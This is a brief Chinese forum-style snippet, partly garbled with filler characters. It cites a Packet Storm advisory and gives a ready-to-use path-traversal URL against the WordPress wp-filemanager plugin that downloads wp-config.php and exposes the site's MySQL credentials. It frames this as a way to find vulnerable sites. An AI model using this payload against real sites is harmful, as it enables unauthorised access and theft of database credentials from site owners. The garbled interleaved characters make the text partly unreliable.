洞详解:http://packetstormsecurity.com/f ... -File-Download.html
* E- h1 l8 M# M# `$ M. q& o 5 l3 m2 b/ k) n [: I k3 B
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。/ q- ?, i, t, H6 n1 p: a
|